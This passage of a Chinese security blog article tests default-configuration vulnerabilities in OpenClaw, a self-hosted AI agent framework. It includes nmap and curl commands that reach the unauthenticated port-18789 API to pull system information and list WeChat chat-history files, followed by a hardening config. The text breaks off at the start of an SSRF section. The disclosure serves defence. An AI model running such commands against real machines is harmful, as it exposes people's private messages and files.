别盲目跟风“养龙虾“!OpenClaw默认配置5大致命漏洞实测,你的微信聊天记录可能正在被上传
测试时间:2026年3月15日-3月22日
测试环境:Windows 11 + OpenClaw v0.9.2(最新版)
核心发现:5个高危漏洞可被利用,默认配置下10分钟可完整接管目标机器
一、先说结论,再讲细节
OpenClaw能不能用?能用,但默认配置下等于裸奔。
隐私会不会泄露?会,我们实测10分钟就拿到了测试机的微信聊天记录。
工信部预警是不是夸大?不是,CVE-2026-25253等漏洞真实存在,GitHub已收录。
普通用户该怎么办?要么别装,要么按本文方案加固后再用。
这篇文章不制造焦虑,只讲我们安全团队这周实测的结果。从漏洞原理到利用过程,从风险等级到修复方案,全部公开。
二、OpenClaw是什么?为什么突然爆火?
2.1 项目背景
OpenClaw(社区昵称"AI龙虾")是一款开源自托管的个人AI智能体框架,核心功能是用自然语言控制计算机执行各种任务。
它能做什么:
┌─────────────────────────────────────────────────────────────────┐ │ OpenClaw核心能力 │ ├─────────────────────────────────────────────────────────────────┤ │ ✅ 文件操作:读取/写入/删除本地任意文件 │ │ ✅ 浏览器控制:自动化访问网页、填写表单、抓取数据 │ │ ✅ 邮件管理:读取/发送Gmail、Outlook、163等邮箱 │ │ ✅ 即时通讯:集成微信、Telegram、飞书等消息接口 │ │ ✅ 系统命令:执行Shell/PowerShell命令 │ │ ✅ API调用:访问任意第三方服务API │ │ ✅ 插件扩展:支持社区插件,功能无限扩展 │ └─────────────────────────────────────────────────────────────────┘为什么火:
- GitHub Star数:90天突破26万(截至2026年3月)
- 中文社区下载量:2026年1月下旬开始急剧攀升
- 一键部署教程:各大技术社区刷屏
但问题也来了:这款工具被授予了极高的系统权限,一旦安全配置不当,后果不堪设想。
三、5大致命风险实测:我们是如何"黑"进测试机的
3.1 风险一:18789端口零认证访问(高危)
漏洞描述:OpenClaw默认开启18789端口用于Web UI和API访问,无需任何认证即可连接。
实测过程:
# 1. 扫描目标机器开放端口nmap-p18789192.168.1.100# 输出:# 18789/tcp open unknown OpenClaw-API# 2. 直接访问API(无需密码)curlhttp://192.168.1.100:18789/api/system/info# 返回系统信息:{"version":"0.9.2","os":"Windows 11","user":"Administrator","home_dir":"C:\\Users\\Administrator","plugins":["file-manager","browser-control","wechat-bridge"]}# 3. 读取任意文件curlhttp://192.168.1.100:18789/api/file/read?path=C:/Users/Administrator/WeChat Files/# 返回微信聊天记录目录列表影响范围:所有未修改默认配置的用户
风险等级:🔴 高危(CVSS 9.8)
修复方案:
# config/security.yamlapi:port:18789authentication:required# 必须开启认证allowed_ips:# 限制访问IP-127.0.0.1-192.168.1.0/24https_only:true# 强制HTTPS3.2 风险二:CVE-2026-25253 SSRF漏洞(高危)
漏洞描述:OpenClaw的插件系统存在服务端请求伪造(SSRF)漏洞,攻击者可利用此漏洞访问内网资源。
漏洞原理图:
┌─────────────────────────────────────────────────────────────────┐ │ CVE-2026-25253 攻击链路 │ ├─────────────────────────────────────────────────────────────────┤ │